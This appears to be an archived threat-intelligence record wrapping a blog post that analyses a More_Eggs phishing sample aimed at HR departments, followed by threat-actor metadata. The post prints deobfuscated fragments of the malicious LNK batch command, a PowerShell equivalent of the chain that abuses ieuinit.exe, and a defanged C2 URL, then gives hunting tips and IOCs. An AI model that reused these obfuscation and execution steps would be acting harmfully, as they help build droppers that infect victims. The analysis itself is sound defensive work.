{ "id": "f4fa64cd-d32f-449c-9554-bb27b020b6ee", "created_at": "2026-04-06T00:14:24.925861Z", "updated_at": "2026-04-10T03:36:08.282395Z", "deleted_at": null, "sha1_hash": "026b032f45e8456ea6c79cd9b5dbadef372f31a5", "title": "More_Eggs? A Venom Spider Backdoor Targeting HR", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3079484, "plain_text": "More_Eggs? A Venom Spider Backdoor Targeting HR\r\nBy Tonmoy Jitu\r\nPublished: 2025-05-17 · Archived: 2026-04-05 16:18:27 UTC\r\nThe More_Eggs malware, operated by the financially motivated Venom Spider (aka Golden Chickens) group, is a potent\r\nJavaScript backdoor sold as Malware-as-a-Service (MaaS) to threat actors like FIN6 and Cobalt Group. Known for targeting\r\nhuman resources (HR) departments, it exploits the trust in job application emails to deliver malicious payloads.\r\nThis blog analyzes a recent More_Eggs sample, Sebastian Hall.zip , which contains a decoy image and a malicious\r\nWindows shortcut ( LNK ) file. The purpose of this analysis is to:\r\nDeobfuscate the LNK ’s command to understand its actions.\r\nAnalyze the ieuinit.inf file for C2 configuration.\r\nLocate the JS file, a hallmark of More_Eggs .\r\nInitial Triage and Sample Overview\r\nThe Sebastian Hall.zip sample, sourced from MalwareBazaar, was confirmed as part of the More_Eggs campaign. The\r\nZIP file includes:\r\nImage File ( b.jpg ): Likely a decoy to trick users into believing the ZIP is legitimate.\r\nLNK File ( Sebastian Hall.lnk ): A Windows shortcut file that, upon inspection, reveals a linker file structure in its\r\nproperties, executing malicious commands.\r\nFig 01: Content of Sebastian Hall.zip\r\nFig 02: Virus total conviction\r\nStatic Analysis: De-obfuscating the LNK\r\nThe LNK file ( Sebastian Hall.lnk ) is the heart of the More_Eggs malware’s infection chain. Checking its properties\r\n( right-click \u003e Properties ) showed only the Target field ( C:\\Windows\\System32\\cmd.exe ), with the Arguments field\r\nhidden due to Windows’ truncation of long command lines.\r\nhttps://denwp.com/more-eggs-venom-spider-phishing-campaign/\r\nPage 1 of 8\n\nFig 03: File properties\r\nExtracting the Full Command with LECmd\r\nLECmd is a specialized forensic tool designed specifically for Windows LNK file analysis. You can use LECmd to extract\r\nthe complete command line argument using the below command:\r\nLECmd.exe -f \"Sebastian Hall.lnk\"\r\nFig 04: LECmd output\r\nLECmd provides detailed output of all LNK file components, including machine ID, MAC addresses, and volume\r\ninformation. The tool helps with extracting TrackerDataBlock information that many other tools miss, and recovers\r\ndeleted/overwritten target paths that may still exist in the file structure.\r\nExtracting the Full Command with Exiftool\r\nYou can also use Exiftool to extract the complete command line argument using the below command:\r\nhttps://denwp.com/more-eggs-venom-spider-phishing-campaign/\r\nPage 2 of 8\n\nexiftool .\\Sebastian Hall.lnk\r\nFig 06: Exiftool output\r\nCommand de-obfuscation\r\nThe extracted command line argument contains heavily obfuscated batch script code. Obfuscation in these batch scripts\r\ninvolves transforming straightforward commands ( echo , xcopy , start ) into complex, unreadable forms to hinder\r\nanalysis. The scripts achieve this through variable fragmentation, redundant code, and syntactic manipulation, common in\r\nMore_Eggs LNK payloads.\r\n/v /c start \"\" \"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\" \u0026 (for %f in (\"peric=s\" \"tartarly=e\" \"unvoya\r\nFig 07: Obfuscated hidden command\r\nBreaking down the obfuscation techniques\r\n1. The script starts Microsoft Word as a decoy to make the user believe the document is legitimate:\r\nstart \"\" \"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\"\r\n2. Uses for loops and delayed expansion to build command components, and uses variable substitution to build\r\ncommands, peric -\u003e s , tartarly -\u003e e , and unvoyagingu -\u003e al :\r\nhttps://denwp.com/more-eggs-venom-spider-phishing-campaign/\r\nPage 3 of 8\n\n(for %f in (\"peric=s\" \"tartarly=e\" \"unvoyagingu=al\") do @set %~f)\r\n!peric!et \" jugs=e\" → set \" jugs=e\"\r\nc!unvoyagingu!l s!tartarly!t \" colberte=c\" → call set \" colberte=c\"\r\n3. Constructs and writes an .inf file ( %temp%\\ieuinit.inf ) with encoded data:\r\n(for %o in (\"[version]\" ...) do @echo %~o) \u003e \"%temp%\\ieuinit.inf\"\r\n4. Copies a native system file, ieuinit.exe , and executes it with malicious parameters:\r\nxcopy /Y /C /Q %windir%\\system32\\ieuinit.exe \"%temp%\"\r\nstart \"\" %temp%\\ieuinit.exe -basjestings\r\nIn short, the batch script constructs a payload through obfuscated variable assignments, a hallmark of More_Eggs\r\n(Malpedia). The .inf file contains encoded strings, possibly a Base64 payload or configuration. The executed\r\nieuinit.exe triggers further malicious actions, such as downloading a JScript or DLL.\r\nFig 08: De-obfuscated code\r\nExecution Flow Analysis\r\nThe script starts by quietly defining aliases for two key Windows directories, %temp% (where temporary files live) and\r\n%windir% (the Windows installation folder).\r\n$wordPath = \"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\"\r\n$tempFile = \"$env:TEMP\\ieuinit.inf\"\r\n$ieuinitExeSource = \"$env:WINDIR\\system32\\ieuinit.exe\"\r\n$ieuinitExeDest = \"$env:TEMP\\ieuinit.exe\"\r\nNext, the script builds fragments of commands, file names, and URLs, stored in variables with bizarre names like\r\ngeoscientis or wagonwayma .\r\nThe script writes a file called ieuinit.inf to the %temp% directory, designed to look like a legitimate Windows INF file.\r\nYou’d expect sections like [version] or [strings] , but instead, it’s packed with malicious data, including a malicious\r\nURL and encoded strings. This file is the malware’s instruction manual, disguised as a configuration file.\r\nThe script then grabs ieuinit.exe from %windir%\\system32 and copies it to %temp% . By sourcing it from a trusted\r\nsystem directory, the malware avoids raising red flags. The copy operation uses xcopy with flags like /Y (overwrite\r\nwithout prompting) and /Q (quiet mode), ensuring it’s quick and silent.\r\nFinally, the script runs %temp%\\ieuinit.exe with an argument like -basjestings . This is the moment the malware goes\r\nlive, potentially executing JavaScript (JS), loading a malicious DLL, or reaching out to a C2 server for further instructions.\r\nThe argument might seem random, but it’s likely a trigger for specific malicious behavior.\r\nhttps://denwp.com/more-eggs-venom-spider-phishing-campaign/\r\nPage 4 of 8\n\n# Clear text commands\r\n# Start Microsoft Word\r\nStart-Process -FilePath $wordPath -ErrorAction Stop\r\n# Write content to ieuinit.inf\r\n$infContent | Out-File -FilePath $tempFile -Encoding ASCII -ErrorAction Stop\r\n# Copy ieuinit.exe to temp directory\r\nCopy-Item -Path $ieuinitExeSource -Destination $ieuinitExeDest -Force -ErrorAction Stop\r\n# Start ieuinit.exe with arguments\r\nstart-Process -FilePath $ieuinitExeDest -ArgumentList \"-basjestings\" -ErrorAction Stop\r\nTo keep the victim distracted while all this happens, the script often launches Microsoft Word from C:\\Program\r\nFiles\\Microsoft Office\\root\\Office16 .\r\nFig 09: Attack chain\r\nAnalyzing ieuinit.inf configuration file\r\nThe ieuinit.inf file mimics a Windows INF file, complete with fake sections like [version] . In reality, it’s a\r\nplaybook for ieuinit.exe , packed with encoded data.\r\nOne string, dikeriain_CB2CEC , is likely a Base64 or custom-encoded tag, possibly a payload ID or decryption key.\r\nAnother, a mess of variables like j%cinem%d%tra%l... , decodes to a URL ( hxxp[://]wfshtl[.]com/abf2iawq ). Then\r\nthere’s i%acystiaco%u... , which becomes ieuinif.inf , which is a filename.\r\nThese strings are obfuscated using random variables to avoid antivirus scans. By hiding URLs and commands this way,\r\nMore_Eggs keeps its C2 communication or payload delivery under wraps.\r\nA legitimate Windows binary, ieuinit.exe , is abused by More_Eggs to execute malicious tasks without raising alarms.\r\nNormally, ieuinit.exe handles Internet Explorer updates, but here, it’s copied from %windir%\\system32 to %temp% and\r\nrun with an argument like -basjestings . This argument likely tells it to parse ieuinit.inf , fetching the URL or\r\nexecuting a payload, such as JScript or a DLL.\r\nhttps://denwp.com/more-eggs-venom-spider-phishing-campaign/\r\nPage 5 of 8\n\nFig 10: ieuinit.inf configuration\r\nJavaScript (JS) backdoor\r\nThe ieuinit.exe then downloads a JavaScript (JS) file using the URL. Using Magika, we confirmed the file is indeed\r\nJavaScript.\r\nFig 11: Magika output\r\nThe heavy obfuscation, packed with random variable names and encoded strings, mirrors tactics described by Arctic Wolf\r\nLabs, where Venom Spider uses server-side polymorphism to generate unique JS payloads for each victim, dodging antivirus\r\ndetection.\r\nFig 12: Obfuscated JS Code\r\nScrolling further down, we find a decryptor and the More_Eggs dropper.\r\nhttps://denwp.com/more-eggs-venom-spider-phishing-campaign/\r\nPage 6 of 8\n\nFig 13: Obfuscated JS Code\r\nThis dropper, as Arctic Wolf notes, generates a JS launcher and payload, ultimately deploying the More_Eggs backdoor, a\r\nmodular payload that steals system info and contacts C2 servers. The sample file’s behavior aligns with this, likely fetching\r\na DLL and additional scripts to deepen the infection.\r\nDigging into the JS file proved tricky due to its anti-debugging features, but for a deeper look at the More_Eggs_Dropper ,\r\ncheck out Arctic Wolf’s analysis..\r\nThe below artifacts can be used to hunt for More_Eggs :\r\nWatch for unexpected launches of Microsoft Word or WordPad, often triggered by LNK files to distract users while\r\nthe payload runs. Check process trees for cmd.exe spawning these apps alongside suspicious binaries\r\n( ieuinit.exe ).\r\nMonitor ieuinit.exe executions from %temp% , not %windir%\\system32 . More_Eggs uses this LOLBAS with\r\narguments like -basjestings to parse ieuinit.inf .\r\nSearch %temp% for ieuinit.inf and ieuinit.exe , and remove them.\r\nFlag LNK files within ZIP attachments. More_Eggs attacks commonly involve ZIP files that contain both a\r\nmalicious LNK file and a decoy JPG image.\r\nIOC\r\nSHA256\r\n4e18f606f7a31ffbea632ceaffad77689f810a3cde26d2a913d4530eaae5c5d1\r\n46f587b4375bb3295a5361ee0a0ee0da3b91173852d8aa4c156d0706f55536ee499815559568ab0684e6f6b68180347da32faf76258da3e5e2d7c6839c9b1020\r\n====================================================\r\nURL: hxxp[://]wfshtl[.]com/abf2iawq\r\n💡\r\nAdditional IOCs can be found related to More_Eggs in my git repository.\r\nReference:\r\nVenom Spider Uses Server-Side Polymorphism to Weave a Web Around Victims - Arctic Wolf\r\nArctic Wolf Labs discovered a new campaign targeting corporate HR departments with fake resumes that drop\r\na malicious backdoor called More_eggs onto their devices.\r\nhttps://denwp.com/more-eggs-venom-spider-phishing-campaign/\r\nPage 7 of 8\n\nArctic WolfArctic Wolf Labs\r\nMDR in Action: Preventing The More_eggs Backdoor From Hatching\r\nTrend MicroContact Us\r\nSource: https://denwp.com/more-eggs-venom-spider-phishing-campaign/\r\nhttps://denwp.com/more-eggs-venom-spider-phishing-campaign/\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://denwp.com/more-eggs-venom-spider-phishing-campaign/" ], "report_names": [ "more-eggs-venom-spider-phishing-campaign" ], "threat_actors": [ { "id": "12517c87-040a-4627-a3df-86ca95e5c13f", "created_at": "2022-10-25T16:07:23.61665Z", "updated_at": "2026-04-10T02:00:04.689Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "ATK 88", "Camouflage Tempest", "FIN6", "G0037", "Gold Franklin", "ITG08", "Skeleton Spider", "Storm-0538", "TAAL", "TAG-CR2", "White Giant" ], "source_name": "ETDA:FIN6", "tools": [ "AbaddonPOS", "Agentemis", "AmmyyRAT", "Anchor_DNS", "BlackPOS", "CmdSQL", "Cobalt Strike", "CobaltStrike", "FlawedAmmyy", "FrameworkPOS", "Grateful POS", "JSPSPY", "Kaptoxa", "LOLBAS", "LOLBins", "Living off the Land", "LockerGoga", "MMon", "Magecart", "Meterpreter", "Mimikatz", "More_eggs", "NeverQuest", "POSWDS", "Reedum", "Ryuk", "SCRAPMINT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Terra Loader", "TerraStealer", "Vawtrak", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "cobeacon", "grabnew" ], "source_id": "ETDA", "reports": null }, { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f5c90ccc-0f18-4e07-a246-b62101ab2f6f", "created_at": "2023-01-06T13:46:38.854407Z", "updated_at": "2026-04-10T02:00:03.122844Z", "deleted_at": null, "main_name": "GC02", "aliases": [ "Golden Chickens", "Golden Chickens02", "Golden Chickens 02" ], "source_name": "MISPGALAXY:GC02", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f2fa9952-301f-4376-ac69-743d6f2bec1e", "created_at": "2023-01-06T13:46:39.122721Z", "updated_at": "2026-04-10T02:00:03.22231Z", "deleted_at": null, "main_name": "VENOM SPIDER", "aliases": [ "badbullz", "badbullzvenom" ], "source_name": "MISPGALAXY:VENOM SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9", "created_at": "2022-10-25T15:50:23.317961Z", "updated_at": "2026-04-10T02:00:05.280403Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "FIN6", "Magecart Group 6", "ITG08", "Skeleton Spider", "TAAL", "Camouflage Tempest" ], "source_name": "MITRE:FIN6", "tools": [ "FlawedAmmyy", "GrimAgent", "FrameworkPOS", "More_eggs", "Cobalt Strike", "Windows Credential Editor", "AdFind", "PsExec", "LockerGoga", "Ryuk", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e", "created_at": "2024-06-19T02:03:08.052814Z", "updated_at": "2026-04-10T02:00:03.659971Z", "deleted_at": null, "main_name": "GOLD FRANKLIN", "aliases": [ "FIN6 ", "ITG08 ", "MageCart Group 6 ", "Skeleton Spider ", "Storm-0538 ", "White Giant " ], "source_name": "Secureworks:GOLD FRANKLIN", "tools": [ "FrameWorkPOS", "Metasploit", "Meterpreter", "Mimikatz", "PowerSploit", "PowerUpSQL", "RemCom" ], "source_id": "Secureworks", "reports": null }, { "id": "88802a4b-5b3d-42ee-99e6-8a4f5fd231f6", "created_at": "2023-01-06T13:46:38.851345Z", "updated_at": "2026-04-10T02:00:03.121861Z", "deleted_at": null, "main_name": "GC01", "aliases": [ "Golden Chickens", "Golden Chickens01", "Golden Chickens 01" ], "source_name": "MISPGALAXY:GC01", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2dfaa730-7079-494c-b2f0-3ff8f3598a51", "created_at": "2022-10-25T16:07:23.474746Z", "updated_at": "2026-04-10T02:00:04.623746Z", "deleted_at": null, "main_name": "Cobalt Group", "aliases": [ "ATK 67", "Cobalt Gang", "Cobalt Spider", "G0080", "Gold Kingswood", "Mule Libra", "TAG-CR3" ], "source_name": "ETDA:Cobalt Group", "tools": [ "ATMRipper", "ATMSpitter", "Agentemis", "AmmyyRAT", "AtNow", "COOLPANTS", "CobInt", "Cobalt Strike", "CobaltStrike", "Cyst Downloader", "Fareit", "FlawedAmmyy", "Formbook", "Little Pig", "Metasploit Stager", "Mimikatz", "More_eggs", "NSIS", "Nullsoft Scriptable Install System", "Pony Loader", "Ripper ATM", "SDelete", "Siplog", "SoftPerfect Network Scanner", "SpicyOmelette", "Taurus Builder", "Taurus Builder Kit", "Taurus Loader", "Terra Loader", "ThreatKit", "VenomKit", "cobeacon", "win.xloader" ], "source_id": "ETDA", "reports": null }, { "id": "ee3363a4-e807-4f95-97d8-b603c31b9de1", "created_at": "2023-01-06T13:46:38.485884Z", "updated_at": "2026-04-10T02:00:02.99385Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "SKELETON SPIDER", "ITG08", "MageCart Group 6", "ATK88", "TA4557", "Storm-0538", "White Giant", "GOLD FRANKLIN", "G0037", "Camouflage Tempest" ], "source_name": "MISPGALAXY:FIN6", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c11abba0-f5e8-4017-a4ee-acb1a7c8c242", "created_at": "2022-10-25T15:50:23.744036Z", "updated_at": "2026-04-10T02:00:05.294413Z", "deleted_at": null, "main_name": "Cobalt Group", "aliases": [ "Cobalt Group", "GOLD KINGSWOOD", "Cobalt Gang", "Cobalt Spider" ], "source_name": "MITRE:Cobalt Group", "tools": [ "Mimikatz", "More_eggs", "SpicyOmelette", "SDelete", "Cobalt Strike", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "7a257844-df90-4bd4-b0f1-77d00ff82802", "created_at": "2022-10-25T16:07:24.376356Z", "updated_at": "2026-04-10T02:00:04.964565Z", "deleted_at": null, "main_name": "Venom Spider", "aliases": [ "Golden Chickens", "TA4557", "Venom Spider" ], "source_name": "ETDA:Venom Spider", "tools": [ "More_eggs", "PureLocker", "SONE", "SpicyOmelette", "StealerOne", "Taurus Builder", "Taurus Builder Kit", "Taurus Loader", "Taurus Loader Reconnaissance Module", "Taurus Loader Stealer Module", "Taurus Loader TeamViewer Module", "Terra Loader", "TerraCrypt", "TerraLogger", "TerraPreter", "TerraRecon", "TerraStealer", "TerraTV", "TerraWiper", "ThreatKit", "VenomKit", "VenomLNK", "lite_more_eggs" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434464, "ts_updated_at": 1775792168, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/026b032f45e8456ea6c79cd9b5dbadef372f31a5.pdf", "text": "https://archive.orkl.eu/026b032f45e8456ea6c79cd9b5dbadef372f31a5.txt", "img": "https://archive.orkl.eu/026b032f45e8456ea6c79cd9b5dbadef372f31a5.jpg" } }